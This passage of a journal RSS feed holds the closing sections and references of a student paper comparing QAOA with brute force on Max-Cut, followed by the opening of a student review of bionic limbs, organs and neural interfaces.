<p>Another key observation concerns the approximation ratio. The experimental results show the QAOA solution’s approximation ratio decreasing as graph size increases. For small graphs, QAOA often produces cuts close to optimal, but for larger graphs its performance deteriorates. In this investigation, several factors can cause this behavior. Firstly, with a low, fixed circuit depth (p = 1), QAOA has little chance of producing near-optimal cut values, because the parameters are not optimized enough for the Cost Hamiltonian’s application to concentrate measurement probability on bitstrings (basis states in the solution space) representing better cuts. As graph size grows, the solution space becomes exponentially larger, and a single-layer circuit cannot adequately explore it to consistently favor bitstrings representing good cut values – especially detrimental when the optimal cut corresponds to a low-probability event. Secondly, the fixed parameter pair (γ = π/4, β = π/2) used in all runs, while simplifying the procedure, prevents dynamic tuning of QAOA to different graph configurations, resulting in lower approximation ratios as the number of nodes (and therefore qubits) increases. Lastly, and most generically, there is noise: as the number of qubits used and operations performed increases, so does the capacity of noise to disturb the compound quantum state the circuit manipulates, blurring the probability distribution over basis states – and therefore over the measured bitstrings – and yielding suboptimal cut values.</p>



<h2 class="wp-block-heading"><strong>Implications</strong></h2>



<p>This section considers the implications of the preceding findings for the scalability of classical and quantum algorithms, and for when practical quantum advantage on NP-hard optimization problems such as Max-Cut begins to show. It then assesses the viability of QAOA on modern NISQ hardware and considers the improvements that may follow as quantum hardware advances.</p>



<p>The findings presented in the previous sections demonstrate an important advantage of executing QAOA on real quantum hardware over the classical brute-force solution: while the latter rapidly becomes infeasible at scale due to exponentially increasing execution time, QAOA maintains roughly constant, or at worst sub-linear, growth in execution time. Although the current implementation is not faster than classical computation on relatively small graphs, its scalability over medium to large graphs suggests potential long-term advantages. However, the observed relationship between graph size and approximation ratio poses a hurdle for accuracy. The steadily declining approximation ratio reflects the QAOA configuration used, but above all, noise. Even with a near-perfect QAOA implementation, the limitations of NISQ hardware prevent high-depth circuits with high qubit counts from running without accuracy loss due to noise. This keeps the observed advantages of QAOA from being effective where they are needed most – on large problems and, in the case of Max-Cut, on large graphs – highlighting the underlying trade-off between speed and accuracy.</p>



<h2 class="wp-block-heading"><strong>Conclusion</strong></h2>



<p>In summary, this investigation was designed to explore and demonstrate the feasibility of running QAOA for the Max-Cut problem on real quantum devices, comparing its performance against the classical brute-force method to gauge the potential advantages quantum algorithms may offer as input size grows. The end goal is to determine when quantum algorithms start to outperform their classical counterparts.</p>



<p>The experimental results confirm that the classical brute-force algorithm scales exponentially with input size, becoming infeasible fairly quickly – over the smaller graphs in the tested range, execution times were fairly short, but towards the upper end they shot upward at an alarming rate – whereas the QAOA solution had almost constant runtime for all graph sizes, at the cost of accuracy as graph size increased. This limitation was shown by the decreasing average approximation ratio across all 5 trials as graph size increased, primarily due to the very low circuit depth (p = 1), constant QAOA parameters, and, most importantly, the greater potential for noise on larger graphs – an issue for NISQ devices in general. Nevertheless, these findings support the theoretical expectation that quantum algorithms can outperform classical ones in speed, even if the shortcomings of NISQ hardware prevent that advantage from being fully realized at large problem sizes.</p>



<p>Ultimately, the insights from this investigation provide a foundation for understanding how quantum algorithms scale with problem size and bring us one step closer to realizing practical quantum advantage on complex NP-hard problems like Max-Cut at large problem sizes. Looking to the future, more advanced quantum hardware with larger qubit counts and lower noise levels will make increasing QAOA depth (p > 1) feasible with little effect on accuracy, allowing faster and more accurate solutions to Max-Cut and other NP-hard problems – with applications in areas such as semiconductor design, image segmentation in computer vision, financial modeling, and data-flow optimization, all of which use the Max-Cut problem for various purposes.</p>



<h2 class="wp-block-heading"><strong>References</strong></h2>



<p>Agarapu, R. (2024). <em>What is Hamiltonian in quantum mechanics?</em> Online Tutorial Hub. Retrieved October 26, 2025, from <a href="https://onlinetutorialhub.com/quantum-computing-tutorials/what-is-hamiltonian-in-quantum-mechanics/">https://onlinetutorialhub.com/quantum-computing-tutorials/what-is-hamiltonian-in-quantum-mechanics/</a></p>



<p>Algor Education. (n.d.). <em>Brute Force Computing</em>. Algor Education. Retrieved October 26, 2025, from <a href="https://cards.algoreducation.com/en/content/9CDDR2hL/brute-force-computing">https://cards.algoreducation.com/en/content/9CDDR2hL/brute-force-computing</a></p>



<p>Asfaw, A., Bello, L., Ben-Haim, Y., Bravyi, S., Capelluto, L., Carrera Vazquez, A., Ceroni, J., Gambetta, J., Garion, S., Gil, L., De La Puente Gonzalez, S., McKay, D., Minev, Z., Nation, P., Phan, A., Rattew, A., Shabani, J., Smolin, J., Temme, K., … Wootton, J. (n.d.). <em>Learn Quantum Computing using Qiskit</em>. Retrieved October 26, 2025, from <a href="https://github.com/RafeyIqbalRahman/Qiskit-Textbook/blob/master/Learn%20Quantum%20Computing%20using%20Qiskit.pdf">https://github.com/RafeyIqbalRahman/Qiskit-Textbook/blob/master/Learn%20Quantum%20Computing%20using%20Qiskit.pdf</a></p>



<p>Bacon, D. M. (2003). <em>Decoherence, Control, and Symmetry in Quantum Computers</em> (Doctoral dissertation, University of California, Berkeley). arXiv:quant-ph/0305025. <a href="https://arxiv.org/pdf/quant-ph/0305025">https://arxiv.org/pdf/quant-ph/0305025</a></p>



<p>Blekos, K., Brand, D., Ceschini, A., Chou, C., Li, R., Pandya, K., &amp; Summer, A. (2023). <em>A Review on Quantum Approximate Optimization Algorithm and its Variants</em>. https://arxiv.org/pdf/2306.09198</p>



<p>Cai, J.-Y. (2003). <em>Lecture 20: Goemans-Williamson MAXCUT Approximation Algorithm</em>. University of Wisconsin-Madison. <a href="https://pages.cs.wisc.edu/~jyc/02-810notes/lecture20.pdf">https://pages.cs.wisc.edu/~jyc/02-810notes/lecture20.pdf</a></p>



<p>Ceroni, J. (2025). <em>QAOA introduction tutorial</em>. PennyLane Quantum Machine Learning Demos. <a href="https://pennylane.ai/qml/demos/tutorial_qaoa_intro">https://pennylane.ai/qml/demos/tutorial_qaoa_intro</a></p>



<p>Codecademy. (2022). <em>Greedy algorithm explained</em>. Codecademy. https://www.codecademy.com/article/greedy-algorithm-explained</p>



<p>Davis, R., Lanes, O., Waltrous, J. (2025). <em>What is fault-tolerant quantum computing?</em> Retrieved October 26, 2025, from <a href="https://www.ibm.com/quantum/blog/what-is-ftqc">https://www.ibm.com/quantum/blog/what-is-ftqc</a></p>



<p>DeepAI. (n.d.). <em>Combinatorial optimization – machine learning glossary.</em> DeepAI. https://deepai.org/machine-learning-glossary-and-terms/combinatorial-optimization</p>



<p>EITCA. (2024). <em>In the context of QAOA, how do the cost Hamiltonian and mixing Hamiltonian contribute to exploring the solution space, and what are their typical forms for the Max-Cut problem?</em> EITCA Academy. <a href="https://eitca.org/faq/in-the-context-of-qaoa-how-do-the-cost-hamiltonian-and-mixing-hamiltonian-contribute">https://eitca.org/faq/in-the-context-of-qaoa-how-do-the-cost-hamiltonian-and-mixing-hamiltonian-contribute</a></p>



<p>Fiveable. (n.d.). <em>Objective function</em>. Retrieved October 26, 2025, from <a href="https://library.fiveable.me/key-terms/linear-algebra-and-differential-equations/objective-function">https://library.fiveable.me/key-terms/linear-algebra-and-differential-equations/objective-function</a></p>



<p>Goemans, M. X., &amp; Williamson, D. P. (1995). <em>Improved approximation algorithms for maximum cut and satisfiability problems using semidefinite programming</em>. Journal of the ACM, 42(6), 1115–1145. <a href="https://math.mit.edu/~goemans/PAPERS/maxcut-jacm.pdf">https://math.mit.edu/~goemans/PAPERS/maxcut-jacm.pdf</a></p>



<p>Preskill, J. (2018). <em>Quantum Computing in the NISQ era and beyond</em>. Quantum, 2, 79. <a href="https://quantum-journal.org/papers/q-2018-08-06-79/pdf/">https://quantum-journal.org/papers/q-2018-08-06-79/pdf/</a></p>



<p>Ivezic, M. (2024). <em>Quantum Approximate Optimization Algorithm (QAOA)</em>. Retrieved October 26, 2025, from <a href="https://postquantum.com/quantum-computing/quantum-approximate-optimization-algorithm-qaoa/">https://postquantum.com/quantum-computing/quantum-approximate-optimization-algorithm-qaoa/</a></p>



<p>Jaillet, P. (2010). <em>NP-completeness</em>. MIT 6.006: Introduction to Algorithms. Retrieved from <a href="https://courses.csail.mit.edu/6.006/fall10/lectures/lecture24.pdf">https://courses.csail.mit.edu/6.006/fall10/lectures/lecture24.pdf</a></p>



<p>Kanwal, A. (2021). <em>Understanding P, NP, NP-complete, and NP-hard problems: A fundamental guide</em>. Medium. https://medium.com/@0ayesha.kanwal/understanding-p-np-np-complete-and-np-hard-problems-a-fundamental-guide-3924fc9ece2a</p>



<p>Lee, J. (2010). <em>A first course in combinatorial optimization.</em> Cambridge University Press. <a href="https://books.google.com.tr/books?id=3pL1B7WVYnAC&amp;pg=PA1&amp;redir_esc=y%23v=onepage&amp;q&amp;f=false">https://books.google.com.tr/books?id=3pL1B7WVYnAC&amp;pg=PA1&amp;redir_esc=y#v=onepage&amp;q&amp;f=false</a></p>



<p>Lotshaw, P. C., Nguyen, T., Santana, A., McCaskey, A., Herrman, R., Ostrowski, J., Siopsis, G., &amp; Humble, T. S. (2022). <em>Scaling quantum approximate optimization on near-term hardware</em>. Scientific Reports. <a href="https://www.nature.com/articles/s41598-022-14767-w">https://www.nature.com/articles/s41598-022-14767-w</a></p>



<p>Luca, G. D. (2023). <em>Introduction to graph theory. Baeldung on Computer Science</em>. <a href="https://www.baeldung.com/cs/graph-theory-intro">https://www.baeldung.com/cs/graph-theory-intro</a></p>



<p>Mahmoud, A. (2021, June 27). <em>What is Quantum Computing?</em> TechSpot. <a href="https://www.techspot.com/article/2280-what-is-quantum-computing">https://www.techspot.com/article/2280-what-is-quantum-computing</a></p>



<p>Maltby, H., &amp; Ross, E. (n.d.). <em>Combinatorial optimization</em>. Brilliant. <a href="https://brilliant.org/wiki/combinatorial-optimization/">https://brilliant.org/wiki/combinatorial-optimization</a></p>



<p>Rossi, M., Cohen, S., &amp; Smith, J. (2024). <em>What is Quantum Parallelism, Anyhow?</em>. <a href="https://arxiv.org/html/2405.07222v1">https://arxiv.org/html/2405.07222v1</a></p>



<p>Swayne, M. (2024). <em>Quantum computing challenges</em>. <a href="https://thequantuminsider.com/2023/03/24/quantum-computing-challenges/">https://thequantuminsider.com/2023/03/24/quantum-computing-challenges/</a></p>



<p>Tepanyan, H. (2025). <em>Quantum Computing vs. Classical Computing</em>. Retrieved October 26, 2025, from <a href="https://www.bluequbit.io/quantum-computing-vs-classical-computing">https://www.bluequbit.io/quantum-computing-vs-classical-computing</a></p>



<p>Thomson, J. (2025). <em>What is quantum superposition and what does it mean for quantum computing?</em> Retrieved October 26, 2025, from <a href="https://www.livescience.com/technology/computing/what-is-quantum-superposition-and-what-does-it-mean-for-quantum-computing">https://www.livescience.com/technology/computing/what-is-quantum-superposition-and-what-does-it-mean-for-quantum-computing</a></p>



<p>Toni, B. (2018). <em>Max-Cut lecture notes</em>. University of Toronto. <a href="http://www.cs.toronto.edu/~toni/Courses/Proofs-SOS-2018/Lectures/maxcut.pdf">http://www.cs.toronto.edu/~toni/Courses/Proofs-SOS-2018/Lectures/maxcut.pdf</a></p>



<p>Viana, P.A., Neto, F. (2024). <em>Quantum search algorithms for structured databases</em>. <a href="https://arxiv.org/pdf/2501.01058">https://arxiv.org/pdf/2501.01058</a></p>



<p>Wright, S. J. (2025).<em> Optimization Definition, Techniques, &amp; Facts</em>. Encyclopaedia Britannica. <a href="https://www.britannica.com/science/optimization">https://www.britannica.com/science/optimization</a></p>



<p><strong>Data and code used in this paper are available on GitHub.</strong></p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://exploratiojournal.com/wp-content/uploads/2025/10/yohhaan-headshot.jpg" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Yohhaan Yung Kang Huang</h5><p>Yohhaan Yung Kang Huang is a high school senior passionate about quantum computing and algorithmic problem-solving. Under the mentorship of Dr. Roberto Dos Reis from Northwestern University, he explored how the Quantum Approximate Optimization Algorithm (QAOA) performs on near-term quantum hardware compared to classical methods. He plans to pursue further studies in computer science and quantum information science and contribute to the development of practical quantum technologies. He loves robotics and is part of the school’s FRC team, enjoys music, and plays the piano. He is also driven to help neurodivergent students integrate better in academic and social environments.


</p></figure></div>



<p></p>
<p>The post <a href="https://exploratiojournal.com/quantum-approximate-optimization-algorithm-for-the-max-cut-problem-performance-comparison-with-classical-approaches-on-nisq-devices/">Quantum Approximate Optimization Algorithm for the Max-Cut Problem: Performance Comparison with Classical Approaches on NISQ Devices</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Advanced Human–Computer Interfaces and AI : A Comprehensive Review</title>
		<link>https://exploratiojournal.com/advanced-human-computer-interfaces-and-ai-a-comprehensive-review/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=advanced-human-computer-interfaces-and-ai-a-comprehensive-review</link>
		
		<dc:creator><![CDATA[Vyomesh Vikram Singh]]></dc:creator>
		<pubDate>Tue, 21 Oct 2025 21:05:29 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=4392</guid>

					<description><![CDATA[<p>Vyomesh Vikram Singh<br />
City Montessori School</p>
<p>The post <a href="https://exploratiojournal.com/advanced-human-computer-interfaces-and-ai-a-comprehensive-review/">Advanced Human–Computer Interfaces and AI : A Comprehensive Review</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author:</strong> Vyomesh Vikram Singh<br><strong>Mentor</strong>: Dr. Zion Tse<br><em>City Montessori School</em></p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>Human–computer interfaces represent a rapidly advancing frontier in biomedical engineering, integrating mechanical, electronic, neural, and Artificial Intelligence (AI) technologies to restore or augment lost human function. This review synthesizes recent developments in advanced human–computer interfaces, spanning bionic limbs, organs, and neural interfaces, drawing on both clinical and engineering perspectives. With a focus on state-of-the-art innovations published within the last five years, the paper highlights breakthroughs in AI-driven sensory feedback, adaptive control algorithms, biomaterials, and clinical translation. By situating these advances within the broader context of unmet clinical needs and rehabilitation goals, this review identifies current challenges and outlines future directions for fully integrated, intelligent human–machine systems.</p>



<p><em>Index Terms</em></p>



<p><em>Machine learning, Deep learning, Reinforcement learning, Edge computing, On-device AI, Computer vision, Bionic limbs, brain–computer interfaces, prosthetics, neuromorphic vision, osseointegration, artificial pancreas, neural interfaces, Advanced Human–Computer Interfaces, AI, biomedical engineering, neuroprosthetics, human–machine symbiosis, wearable robotics, neuroengineering, biocompatible materials, smart prosthetics, adaptive control, closed-loop systems, neural decoding, assistive technology, implantable devices, bioelectronics, translational medicine, cybernetics.</em></p>



<h2 class="wp-block-heading">I. Introduction</h2>



<p>The pursuit of artificial devices that restore lost biological function is as old as medicine itself, with early wooden prosthetic legs and iron hooks marking humanity’s first attempts at bionics. In the modern era, bionic devices have come to represent a class of technologies that combine mechanical hardware, electronic control, and neural interfacing to restore sensory, motor, or organ-level function. These devices are no longer crude substitutes; rather, they aim for seamless integration with the human nervous system, allowing users to experience levels of dexterity, feedback, and autonomy once thought impossible.</p>



<p>The importance of this field is underscored by the prevalence of disability worldwide. According to the World Health Organization, over 2.4 billion people globally live with conditions requiring rehabilitation [21]. Of these, limb loss affects more than 57 million people, while vision loss (addressable by devices like the bionic eye) impacts at least 43 million blind individuals [21]. In diabetes alone, more than 530 million people require continuous glucose management, and the artificial pancreas is emerging as a transformative bionic organ [23]. These statistics highlight the vast unmet need that bionic technologies attempt to address.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="754" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-1024x754.jpeg" alt="" class="wp-image-4555" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-1024x754.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-300x221.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-768x566.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-1000x736.jpeg 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-230x169.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-350x258.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-480x354.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/image.jpeg 1165w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 1: Global burden of conditions addressed by bionics. Bars show approximate affected populations: limb loss (57M), blindness (43M), cochlear implant users (∼0.7M), and diabetes (530M). Data sources: WHO Global Report on Rehabilitation [21] (limb loss, blindness, diabetes) and Wilson (cochlear implant users) [24].</p>



<h2 class="wp-block-heading">II. Overview of Human-Computer Interfaces</h2>



<p>Human–Computer Interfaces (HCIs) can be defined as artificial constructs designed to replace or augment biological structures, with the unique feature of neural, physiological, and increasingly AI-driven integration. Unlike conventional prosthetics or implants that function passively, HCIs actively sense, compute, learn, and actuate.</p>



<p>Historically, the field has undergone several stages. Early prosthetics, such as Egyptian wooden toes or Roman iron hands, were primarily cosmetic or functional in the most basic sense. By the 16th century, artisans like Ambroise Paré introduced mechanical limbs with crude joint mechanisms. The 20th century saw the introduction of body-powered prostheses (using cables and harnesses), followed by the revolutionary myoelectric control in the 1960s, which used Electromyographic (EMG) signals for actuation [16]. In parallel, sensory HCIs began with the cochlear implant (1972), the first device to restore a lost sensory modality via direct neural stimulation, paving the way for retinal implants and, more recently, neuromorphic vision systems based on organic semiconductors and perovskite nanowire arrays [10], [11]. Organ-level HCIs have also advanced, most notably the artificial pancreas, which integrates glucose sensors, insulin pumps, and AI-based closed-loop metabolic control algorithms [23].</p>
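<p>To illustrate the closed-loop principle behind devices like the artificial pancreas, the toy Python sketch below senses a (simulated) glucose value, computes a correction, and actuates a (simulated) pump. Every constant and the plant model are invented for illustration; real systems use clinically validated control algorithms [23]:</p>



<pre class="wp-block-code"><code>def control_step(glucose_mg_dl, target=110.0, kp=0.01):
    """Toy proportional controller: dose insulin only above the target level."""
    error = glucose_mg_dl - target
    return max(0.0, kp * error)  # insulin units for this control step

glucose = 180.0
for step in range(5):
    dose = control_step(glucose)  # sense and compute
    glucose -= 20.0 * dose        # crude plant model: insulin lowers glucose
    print(f"step {step}: dose={dose:.2f} U, glucose={glucose:.1f} mg/dL")
</code></pre>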



<p>To situate the reader in the diversity of modern HCIs, Table I summarizes major categories of systems, their principles of operation, and representative examples. This overview highlights a unifying theme: HCIs are no longer restricted to mechanical substitution. Instead, modern systems seek bidirectional communication with the nervous system—allowing users not only to control artificial devices but also to receive naturalistic sensory feedback enhanced by adaptive AI.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="346" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-1-1024x346.jpeg" alt="" class="wp-image-4556" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-1-1024x346.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-1-300x101.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-1-768x260.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-1-1000x338.jpeg 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-1-230x78.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-1-350x118.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-1-480x162.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-1.jpeg 1165w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 2: Taxonomy of Human–Computer Interfaces (HCIs) across five categories: limbs [1], eyes [10], ears [22], organs [23], and brain–computer interfaces (BCIs) [14].</p>



<p>TABLE I: Major Classes of Bionic Devices, Principles, and Examples</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Category</td><td>Principle of Operation</td><td>Key Examples</td><td>Representative</td></tr><tr><td>Bionic Limbs</td><td>Capture myoelectric/neural signals; actuate robotic joints; provide sensory feedback via electrodes/sensors</td><td>Neuromusculoskeletal prosthesis; bidirectional limb; targeted reinnervation systems</td><td>Ortiz-Catalan et al. (2023) [1], Marasco et al. (2021) [3]</td></tr><tr><td>Bionic Eye</td><td>Convert light into electrical signals processed by neuromorphic/electrode arrays interfacing with retina or optic nerve</td><td>Argus II retinal prosthesis; perovskite nanowire retina; TIPS-pentacene retina</td><td>Long et al. (2023) [10], Zhang et al. (2023) [11]</td></tr><tr><td>Bionic Ear</td><td>Convert sound into electrical impulses transmitted via cochlear electrodes</td><td>Cochlear implant</td><td>Loizou (2006) [22], Wilson (2017) [24]</td></tr><tr><td>Bionic Organs</td><td>Closed-loop sensing and actuation replacing organ-level function</td><td>Artificial pancreas; bioartificial heart pumps</td><td>Hovorka (2011) [23], Breton (2019)</td></tr><tr><td>Neural Interfaces / Brain–Computer Interfaces (BCIs)</td><td>Decode brain or peripheral nerve activity to control external devices; deliver stimulation for feedback</td><td>Utah array BCIs; regenerative peripheral nerve interfaces (RPNIs)</td><td>Hochberg et al. (2012) [14], Cho et al. (2023) [7]</td></tr></tbody></table></figure>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="395" height="592" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-2.jpeg" alt="" class="wp-image-4557" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-2.jpeg 395w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-2-200x300.jpeg 200w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-2-230x345.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-2-350x525.jpeg 350w" sizes="(max-width: 395px) 100vw, 395px" /></figure>



<p>Fig. 3: Functional pipeline of a bionic device: input signals (e.g., EMG/EEG/sensors) → processing/AI → actuation (prosthesis/pump) → feedback (tactile/visual/auditory).</p>



<h2 class="wp-block-heading">III. Current Types of Human-Computer Interfaces</h2>



<p>HCIs span a wide range of applications, from motor prostheses that restore limb function to sensory prostheses that recreate lost modalities such as hearing and vision. In addition, organ-level HCIs represent an emerging frontier where closed-loop control systems, often enhanced by AI, substitute for failing metabolic or physiological functions. In this section, we review the major classes of HCIs, focusing on their principles of operation, technological foundations, and representative studies from the past five years. Throughout this review, we use Human–Computer Interfaces (HCIs) as the overarching term for technologies that bridge biological and computational systems. Terms such as bionic limbs, bionic eyes, and related phrases denote specific subsets of HCIs rather than distinct categories.</p>



<h4 class="wp-block-heading">A. Bionic Limbs</h4>



<p>1. Upper-Limb Prostheses: Upper-limb prostheses have progressed from simple hooks to highly dexterous, multi-articulated robotic hands with neural control. The control of such devices relies primarily on myoelectric signals derived from the residual muscles of the forearm or upper arm. However, conventional surface EMG suffers from poor signal quality, cross-talk, and electrode displacement. To overcome these limitations, modern systems employ implanted electrodes (epimysial, intramuscular) that record stable myoelectric activity over years [1].</p>



<ol class="wp-block-list"></ol>



<p>Advanced interfaces include Targeted Muscle Reinnervation (TMR) and Regenerative Peripheral Nerve Interfaces (RPNIs). TMR surgically reroutes residual nerves to denervated muscles, creating new, amplifiable EMG sites [16]. RPNIs implant nerve endings into muscle grafts, forming stable bioelectrical sources for long-term control [7]. These constructs amplify weak nerve signals into robust EMG activity, enabling fine motor decoding through pattern recognition or regression algorithms.</p>



<p>Recent clinical translation is exemplified by Ortiz-Catalan et al., who demonstrated a transradial neuromusculoskeletal prosthesis integrating osseointegrated titanium implants, implanted electrodes, and neural stimulation [1]. The patient achieved stable prosthetic use in daily life for more than three years, with reduced phantom limb pain and improved quality of life. This represents one of the first long-term demonstrations of a self-contained neural prosthesis outside the laboratory.</p>



<p>TABLE II: Representative Advances in Bionic Limbs</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Study / Device</td><td>Key innovation</td><td>Control Strategy</td><td>Sensory Feedback</td><td>Clinical&nbsp; Outcome</td></tr><tr><td>Ortiz-Catalan et al. (2023) [1]</td><td>OsseointegratedNeuromusculo-skeletal prosthesis</td><td>ImplantedEMG (native +graft)<br></td><td>Ulnar nerve cuff, tactile feedback</td><td>&gt;3 years daily use;Pain reduction</td></tr><tr><td>Marasco et al. (2021) [3]</td><td>Fusion of touch, kinesthesia, and motor control</td><td>TMR&nbsp; + TSR&nbsp;EMG</td><td>Kinesthetic +Tactile reinnervation</td><td>Able-bodied visuomotor behaviours</td></tr><tr><td>Open Source Leg (2020) [6]</td><td>Modular, programmable powered leg</td><td>Adaptive gait control</td><td>Not integrated</td><td>Clinical testing in transfemoral amputees</td></tr><tr><td>BeBionic / i-Limb (commercial)</td><td>Multiarticulated commercial hands</td><td>Surface EMG,Pattern recognition</td><td>Limited vibrotactile feedback</td><td>Widely available, limited embodiment</td></tr></tbody></table></figure>






<p>In addition to control, sensory feedback has become a critical area of research. Extraneural cuff electrodes and intraneural arrays can evoke tactile percepts in the phantom limb when coupled with sensorized prosthetic hands [2]. Marasco et al. further demonstrated the fusion of touch, kinesthesia, and motor control, restoring able-bodied visuomotor behaviors such as reducing visual fixation on the prosthetic hand [3]. These findings suggest that upper-limb prostheses are approaching a new level of embodiment and naturalistic use.</p>



<p>2. Lower-Limb Prostheses: Lower-limb bionics are distinguished by the need to restore both mobility and load-bearing stability. Microprocessor-controlled knees (e.g., Ottobock C-Leg, Össur Rheo Knee) represent the current standard of care, providing adaptive damping based on gait phase detection. Recent developments extend this paradigm to powered prosthetic legs, which incorporate actuators at the knee and ankle.</p>



<ol start="2" class="wp-block-list"></ol>



<p>The Open Source Leg (OSL) is a notable example, offering a modular, customizable platform with open hardware and software [6]. Clinically tested on transfemoral amputees, the OSL provides knee and ankle actuation with programmable gait dynamics. This democratized design accelerates innovation by lowering barriers for academic and clinical groups to experiment with novel control strategies.</p>



<p>3. Osseointegration and Direct Skeletal Attachment: Conventional socket-based attachment causes discomfort, skin breakdown, and instability. Osseointegration—anchoring the prosthesis directly to the skeleton via titanium implants—addresses these issues [15]. Beyond mechanical benefits, osseointegration serves as a human–machine gateway, enabling safe percutaneous feedthroughs for electrodes and sensors. This transforms the limb into a bidirectional interface, capable of both decoding neural intent and delivering somatosensory feedback [1].</p>



<ol start="3" class="wp-block-list"></ol>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="573" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-3-1024x573.jpeg" alt="" class="wp-image-4558" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-3-1024x573.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-3-300x168.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-3-768x430.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-3-1000x560.jpeg 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-3-230x129.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-3-350x196.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-3-480x269.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-3.jpeg 1165w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 4: Comparative performance metrics across device classes (illustrative 0–10 scores). Values synthesize trends reported in representative studies on neuromusculoskeletal limbs [1], [3], bionic vision and retinal systems [5], [10], [11], cochlear implants [22], [24], artificial pancreas systems [23], and clinical/BCI demonstrations [13], [14].</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="528" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.32.44-PM-1024x528.png" alt="" class="wp-image-4559" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.32.44-PM-1024x528.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.32.44-PM-300x155.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.32.44-PM-768x396.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.32.44-PM-1000x516.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.32.44-PM-230x119.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.32.44-PM-350x181.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.32.44-PM-480x248.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.32.44-PM.png 1314w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 5: Case study schematic of osseointegration and neural interfaces in human–computer interface (HCI) limbs. The diagram shows bone anchoring, titanium implant, prosthesis connector, electrodes to nerve/muscle, and percutaneous feedthroughs. Legend: (1) Bone, (2) Titanium implant, (3) Prosthesis connector, (4) Electrodes to nerve/muscle, (5) Skin layer (dashed).</p>



<p>TABLE III: Recent Innovations in Bionic Vision</p>



